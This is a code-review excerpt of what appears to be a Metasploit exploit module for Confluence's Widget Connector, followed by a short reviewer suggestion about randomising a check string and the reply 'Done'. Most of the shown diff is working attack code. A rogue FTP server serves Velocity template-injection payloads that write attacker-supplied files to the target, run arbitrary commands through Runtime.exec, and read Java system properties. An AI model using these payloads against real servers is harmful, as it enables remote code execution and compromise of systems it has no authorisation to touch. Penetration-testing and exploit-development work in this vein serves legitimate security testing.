modules/exploits/multi/http/confluence_widget_connector.rb

```diff
@@ -0,0 +1,456 @@
+  # @param arg [String] RETR argument.
+  # @return [void]
+  def on_client_command_retr(c,arg)
+    vprint_status("FTP download request for #{arg}")
+    conn = establish_data_connection(c)
+    if(not conn)
+      c.put("425 Can't build data connection\r\n")
+      return
+    end
+
+    c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
+    case arg
+    when /check\.vm$/
+      conn.put(wrap(get_check_vm()))
+    when /javaprop\.vm$/
+      conn.put(wrap(get_javaprop_vm()))
+    when /upload\.vm$/
+      conn.put(wrap(get_upload_vm()))
+    when /exec\.vm$/
+      conn.put(wrap(get_exec_vm()))
+    else
+      conn.put(wrap(get_dummy_vm()))
+    end
+    c.put("226 Transfer complete.\r\n")
+    conn.close
+  end
+
+  # Handles ftp PASS command to suppress output.
+  #
+  # @param c [Socket] Control connection socket.
+  # @param arg [String] PASS argument.
+  # @return [void]
+  def on_client_command_pass(c,arg)
+    @state[c][:pass] = arg
+    vprint_status("#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}")
+    c.put "230 Login OK\r\n"
+  end
+
+  # Handles ftp EPSV command to suppress output.
+  #
+  # @param c [Socket] Control connection socket.
+  # @param arg [String] EPSV argument.
+  # @return [void]
+  def on_client_command_epsv(c,arg)
+    vprint_status("#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'")
+    c.put("500 'EPSV #{arg}': command not understood.\r\n")
+  end
+
+  # Returns a upload template.
+  #
+  # @return [String]
+  def get_upload_vm()
+    (
+      <<~EOF
+        $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))
+      EOF
+    )
+  end
+
+  # Returns a command execution template.
+  #
+  # @return [String]
+  def get_exec_vm()
+    (
+      <<~EOF
+        $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()
+      EOF
+    )
+  end
+
+  # Returns checking template.
+  #
+  # @return [String]
+  def get_check_vm()
+    (
+      <<~EOF
+        #{@check_text}
+      EOF
+    )
+  end
+
+  # Returns Java's getting property template.
+  #
+  # @return [String]
+  def get_javaprop_vm()
+    (
+      <<~EOF
+        $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()
+      EOF
+    )
+  end
+
+  # Returns dummy template.
+  #
+  # @return [String]
+  def get_dummy_vm()
+    (
+      <<~EOF
+      EOF
+    )
+  end
+
+  # Checks the vulnerability.
+  #
+  # @return [Array] Check code
+  def check
+    checkcode = Exploit::CheckCode::Safe
+    begin
+      # Start the FTP service
+      print_status("Starting the FTP server.")
+      start_service
+
+      @check_text = Rex::Text.rand_text_alpha(5)
```

Comment:
If desirable and applicable, the number of random characters can also be randomized, for additional randomness, here and elsewhere in the module, like so:

```suggestion
      @check_text = Rex::Text.rand_text_alpha(5..10)
```

Reply:
Done.